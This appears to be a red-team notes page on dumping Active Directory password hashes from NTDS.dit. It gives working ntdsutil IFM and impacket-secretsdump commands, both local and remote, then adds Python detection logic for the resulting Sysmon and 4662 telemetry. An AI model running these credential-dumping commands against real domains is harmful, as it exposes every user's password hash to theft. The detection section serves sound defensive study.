# Dumping NTDS.dit with Active Directory users hashes
If you have no credentials but you have access to the DC, it's possible to dump the ntds.dit using the lolbin ntdsutil.exe:
{% tabs %}
{% tab title="attacker@victim" %}
```bash
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
```
{% endtab %}
{% endtabs %}
The ntds.dit and the SYSTEM and SECURITY registry hives are exported under c:\temp; the SYSTEM hive holds the boot key that is needed to decrypt the hashes offline.
We can then dump the password hashes offline with impacket:
{% tabs %}
{% tab title="attacker@local" %}
```bash
root@~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local
```
{% endtab %}
{% endtabs %}
If you have credentials for an account that can log on to the DC, it's possible to dump the hashes from NTDS.dit remotely over RPC with impacket:
```bash
impacket-secretsdump -just-dc-ntlm offense/[email protected]
```
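Both paths above leave telemetry on the DC: the local IFM route shows up as an `ntdsutil.exe` process creation with `ifm` and `create full` on the command line and as an `ntds.dit` file being written somewhere other than the live database directory, while the remote route is a directory-replication request made by a user account rather than by another domain controller. The following Python is an added detection example, not code from the original page; it triages a constructed batch of Sysmon (Event ID 1 and 11) and Security (Event ID 4662) style records. The event dictionaries, field names, host and user names are assumptions; the two replication GUIDs are the well-known Active Directory control-access-right values for `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All`.

```python
import re
from typing import Iterable

# Control-access-right GUIDs that grant directory replication; a 4662 carrying
# one of these from a non-DC principal is what remote NTDS dumping looks like.
REPLICATION_RIGHT_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

# Default location of the live database (%SystemRoot%\NTDS). Any ntds.dit
# created elsewhere is an IFM/backup copy and deserves a look.
DEFAULT_NTDS_DIR = "\\windows\\ntds\\"

# ntdsutil accepts unique-prefix abbreviations ("ac i ntds" is
# "activate instance ntds"), so both long and short forms are matched.
IFM_PATTERN = re.compile(
    r"\bifm\b.*\bc(?:reate)?\s+(?:s(?:ysvol)?\s+)?f(?:ull)?\b", re.IGNORECASE
)


def _normalize_cmdline(cmdline: str) -> str:
    # Drop quoting so 'create full' and "create full" compare alike,
    # then collapse whitespace runs.
    return " ".join(cmdline.replace("'", " ").replace('"', " ").split()).lower()


def is_ifm_dump(image: str, cmdline: str) -> bool:
    """ntdsutil.exe invoked with the 'ifm' + 'create full' sequence."""
    if not image.lower().endswith("ntdsutil.exe"):
        return False
    return IFM_PATTERN.search(_normalize_cmdline(cmdline)) is not None


def is_ntds_copy_outside_default(target_path: str) -> bool:
    """An ntds.dit written anywhere other than %SystemRoot%\\NTDS."""
    path = target_path.lower().replace("/", "\\")
    if not path.endswith("\\ntds.dit"):
        return False
    return DEFAULT_NTDS_DIR not in path


def is_replication_by_non_dc(subject: str, properties: str, allowlist=()) -> bool:
    """4662 exercising a replication right from a principal that is neither a
    computer account (name ends in '$', e.g. another DC) nor an allow-listed
    sync account (hypothetical allowlist parameter, e.g. an AD sync service)."""
    props = properties.lower()
    if not any(g in props for g in REPLICATION_RIGHT_GUIDS):
        return False
    if subject.endswith("$") or subject.lower() in {a.lower() for a in allowlist}:
        return False
    return True


def triage(events: Iterable[dict], allowlist=()) -> list:
    """Run the three rules over event records and return the alerts raised."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1 and is_ifm_dump(ev.get("Image", ""), ev.get("CommandLine", "")):
            alerts.append({"rule": "ntdsutil_ifm", "host": ev["Computer"], "who": ev["User"]})
        elif eid == 11 and is_ntds_copy_outside_default(ev.get("TargetFilename", "")):
            alerts.append({"rule": "ntds_dit_copy", "host": ev["Computer"], "path": ev["TargetFilename"]})
        elif eid == 4662 and is_replication_by_non_dc(
            ev.get("SubjectUserName", ""), ev.get("Properties", ""), allowlist
        ):
            alerts.append({"rule": "replication_by_user", "host": ev["Computer"], "who": ev["SubjectUserName"]})
    return alerts


# Constructed sample events (hosts, users and paths are made up for the example).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "DC01", "User": "OFFENSE\\jdoe",
     "Image": "C:\\Windows\\System32\\ntdsutil.exe",
     "CommandLine": "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q"},
    {"EventID": 1, "Computer": "DC01", "User": "OFFENSE\\jdoe",
     "Image": "C:\\Windows\\System32\\ntdsutil.exe",
     "CommandLine": "ntdsutil \"activate instance ntds\" ifm \"c s f d:\\ifm\" q q"},
    {"EventID": 1, "Computer": "DC01", "User": "OFFENSE\\backupsvc",
     "Image": "C:\\Windows\\System32\\ntdsutil.exe",
     "CommandLine": "ntdsutil \"ac i ntds\" files info q q"},          # benign maintenance
    {"EventID": 11, "Computer": "DC01", "User": "OFFENSE\\jdoe",
     "TargetFilename": "c:\\temp\\Active Directory\\ntds.dit"},
    {"EventID": 11, "Computer": "DC01", "User": "NT AUTHORITY\\SYSTEM",
     "TargetFilename": "C:\\Windows\\NTDS\\ntds.dit"},                   # benign: live database
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "jdoe",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "DC02$",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},  # benign: DC-to-DC replication
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Running the block prints four alerts: two for the IFM command lines, one for the ntds.dit copy under c:\temp, and one for the replication request made by a user account; the maintenance `files info` invocation, the live database write and the DC-to-DC replication stay quiet. The allowlist exists because directory-sync services legitimately hold replication rights, and the default-path check should be adjusted on DCs where the database was relocated.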
{% embed url="https://adsecurity.org/?p=2362" %}
{% embed url="https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-\(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM\)/" %}